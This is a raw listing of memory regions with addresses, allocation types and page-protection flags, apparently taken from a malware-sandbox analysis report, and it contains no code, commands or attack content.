5130000
heap
page read and write
250000
heap
page read and write
2362000
heap
page read and write
D90000
trusted library allocation
page read and write
2ECF000
heap
page read and write
5DEE000
stack
page read and write
2EC3000
heap
page read and write
4010000
trusted library allocation
page read and write
3A80000
heap
page read and write
33E9000
trusted library allocation
page read and write
5E2F000
stack
page read and write
3DBF000
stack
page read and write
2ECC000
heap
page read and write
2D4E000
heap
page read and write
330000
heap
page read and write
10000
heap
page read and write
190000
heap
page read and write
233E000
stack
page read and write
B5E000
stack
page read and write
2DDE000
heap
page read and write
5F0000
heap
page read and write
740000
heap
page read and write
26C8000
trusted library allocation
page read and write
1EF000
heap
page read and write
367E000
stack
page read and write
33C9000
trusted library allocation
page read and write
3B0000
heap
page read and write
660000
heap
page read and write
2EC7000
heap
page read and write
26F6000
trusted library allocation
page read and write
217E000
stack
page read and write
2DD5000
heap
page read and write
380F000
stack
page read and write
45CE000
stack
page read and write
3BC1000
heap
page read and write
32D000
stack
page read and write
4CE0000
heap
page read and write
2D5E000
heap
page read and write
2DAE000
heap
page read and write
D30000
trusted library allocation
page read and write
353D000
stack
page read and write
2EC7000
heap
page read and write
2100000
heap
page read and write
51EE000
stack
page read and write
4010000
trusted library allocation
page read and write
8AE000
heap
page read and write
15C000
stack
page read and write
400000
system
page execute and read and write
3130000
trusted library allocation
page read and write
1E0000
heap
page read and write
33C1000
trusted library allocation
page read and write
3540000
heap
page read and write
570000
heap
page read and write
460000
heap
page read and write
B60000
trusted library allocation
page read and write
210000
trusted library allocation
page read and write
416000
heap
page read and write
2EF000
stack
page read and write
CC0000
trusted library allocation
page read and write
5ECE000
stack
page read and write | page guard
2E9D000
heap
page read and write
162000
heap
page read and write
4B0000
heap
page read and write
213D000
stack
page read and write
2FAD000
heap
page read and write
36D0000
heap
page read and write
4D3F000
stack
page read and write
430000
trusted library allocation
page read and write
2210000
trusted library allocation
page read and write
355D000
heap
page read and write
215000
trusted library allocation
page execute and read and write
442C000
stack
page read and write
BCB000
stack
page read and write
2EA5000
heap
page read and write
22FF000
stack
page read and write
2D5A000
heap
page read and write
31C000
stack
page read and write
25BE000
trusted library allocation
page read and write
2EAB000
heap
page read and write
506F000
heap
page read and write
5003000
heap
page read and write
5ECF000
stack
page read and write
1F4E000
heap
page read and write
49FE000
stack
page read and write
366000
stack
page read and write
240000
heap
page read and write
7A7000
heap
page read and write
400000
system
page execute and read and write
21C0000
heap
page read and write
961000
heap
page read and write
B70000
trusted library allocation
page execute and read and write
1ED000
trusted library allocation
page execute and read and write
22CF000
stack
page read and write
4CFF000
stack
page read and write
442000
heap
page read and write
607000
heap
page read and write
3130000
trusted library allocation
page read and write
2D5D000
heap
page read and write
7EF000
heap
page read and write
2220000
trusted library allocation
page execute and read and write
215000
trusted library allocation
page execute and read and write
2757000
trusted library allocation
page read and write
4F5D000
stack
page read and write
3B0000
trusted library allocation
page read and write
380000
heap
page read and write
478000
remote allocation
page execute and read and write
7E0000
heap
page read and write
279E000
stack
page read and write
2A9000
heap
page read and write
1CA000
heap
page read and write
4DE000
stack
page read and write
524E000
stack
page read and write
2451000
trusted library allocation
page read and write
2D6A000
heap
page read and write
2EA0000
heap
page read and write
471B000
stack
page read and write
5000000
heap
page read and write
4BE0000
heap
page read and write
2EA5000
heap
page read and write
10000
heap
page read and write
B00000
trusted library allocation
page read and write
1F3D000
heap
page read and write
B30000
heap
page read and write
5E7000
heap
page read and write
260000
trusted library allocation
page execute and read and write
1D0000
trusted library allocation
page read and write
66D000
heap
page read and write
473000
system
page execute and read and write
2782000
trusted library allocation
page read and write
7DB000
heap
page read and write
27F5000
trusted library allocation
page read and write
93E000
stack
page read and write
247F000
stack
page read and write
2F7E000
trusted library allocation
page read and write
318000
stack
page read and write
266A000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
60C0000
heap
page read and write
26A4000
heap
page read and write
8AE000
stack
page read and write | page guard
4010000
trusted library allocation
page read and write
2D30000
heap
page read and write
C2B000
stack
page read and write
8B0000
heap
page read and write
49D000
heap
page read and write
630000
heap
page read and write
3A0F000
stack
page read and write
4BF000
heap
page read and write
8B0000
trusted library allocation
page read and write
384C000
stack
page read and write
6B1000
heap
page read and write
3890000
heap
page read and write
205E000
stack
page read and write
24E1000
trusted library allocation
page read and write
2E31000
heap
page read and write
27CF000
stack
page read and write
2EE000
stack
page read and write | page guard
435000
heap
page read and write
2A58000
heap
page read and write
3FA0000
trusted library allocation
page read and write
650000
heap
page read and write
2DAB000
heap
page read and write
4A9E000
stack
page read and write
20000
heap
page read and write
1F53000
heap
page read and write
2A1E000
stack
page read and write
64E000
heap
page read and write
474000
remote allocation
page execute and read and write
23C1000
trusted library allocation
page read and write
2B4000
heap
page read and write
16D000
stack
page read and write
1E20000
direct allocation
page read and write
809000
heap
page read and write
69F000
heap
page read and write
2F30000
heap
page read and write
2ECF000
heap
page read and write
5FF000
heap
page read and write
93E000
stack
page read and write
2190000
heap
page read and write
10000
heap
page read and write
4E6000
heap
page read and write
36BE000
stack
page read and write
10000000
direct allocation
page read and write
28F000
stack
page read and write
2DDA000
heap
page read and write
632E000
stack
page read and write
23DA000
trusted library allocation
page read and write
3630000
trusted library allocation
page read and write
11B000
stack
page read and write
2D71000
heap
page read and write
248000
trusted library allocation
page read and write
10000
heap
page read and write
217000
trusted library allocation
page execute and read and write
2A3000
trusted library allocation
page read and write
9A7000
heap
page read and write
1F0000
trusted library allocation
page read and write
1EB000
stack
page read and write
4F3F000
stack
page read and write
970000
heap
page read and write
30D0000
heap
page read and write
C80000
trusted library allocation
page read and write
95A000
heap
page read and write
9DD000
stack
page read and write
4F2000
heap
page read and write
B1000
heap
page read and write
300000
heap
page read and write
2DA9000
heap
page read and write
D21000
heap
page read and write
4F1E000
stack
page read and write
890000
heap
page read and write
2ECA000
heap
page read and write
2A9000
trusted library allocation
page read and write
ABF000
stack
page read and write
41B000
system
page execute and read and write
5D0000
heap
page read and write
693000
heap
page read and write
339E000
stack
page read and write
7BE000
stack
page read and write
2EC3000
heap
page read and write
26A8000
trusted library allocation
page read and write
10001000
direct allocation
page execute and read and write
8D0000
trusted library allocation
page read and write
5E7E000
stack
page read and write
978000
heap
page read and write
2523000
trusted library allocation
page read and write
2D85000
heap
page read and write
C95000
trusted library allocation
page read and write
264000
heap
page read and write
3584000
heap
page read and write
606000
heap
page read and write
2DC7000
heap
page read and write
695000
heap
page read and write
21C4000
heap
page read and write
499F000
stack
page read and write
D40000
trusted library allocation
page read and write
39CE000
stack
page read and write
1CC0000
direct allocation
page read and write
2F0000
heap
page read and write
626E000
stack
page read and write
237B000
stack
page read and write
7EF20000
trusted library allocation
page execute and read and write
1FA000
trusted library allocation
page read and write
4010000
trusted library allocation
page read and write
890000
heap
page read and write
AF0000
trusted library allocation
page read and write
21CF000
stack
page read and write
86E000
stack
page read and write
23FF000
stack
page read and write
1C0000
heap
page read and write
240000
trusted library allocation
page read and write
690000
heap
page read and write
A0F000
stack
page read and write
7C5000
heap
page read and write
4FAE000
stack
page read and write
212000
trusted library allocation
page read and write
95A000
heap
page read and write
8E0000
trusted library allocation
page read and write
23D6000
trusted library allocation
page read and write
14B000
stack
page read and write
2D61000
heap
page read and write
275F000
stack
page read and write
2EC3000
heap
page read and write
590000
heap
page read and write
3A8E000
stack
page read and write
2D96000
heap
page read and write
5E3F000
stack
page read and write
59D000
stack
page read and write
D2E000
stack
page read and write
2D76000
heap
page read and write
69B000
heap
page read and write
360000
heap
page read and write
36C000
stack
page read and write
2DC2000
heap
page read and write
23FD000
trusted library allocation
page read and write
AC000
stack
page read and write
34E1000
trusted library allocation
page read and write
20000
heap
page read and write
5272000
heap
page read and write
4B1E000
stack
page read and write
There are 628 hidden memdumps, click here to show them.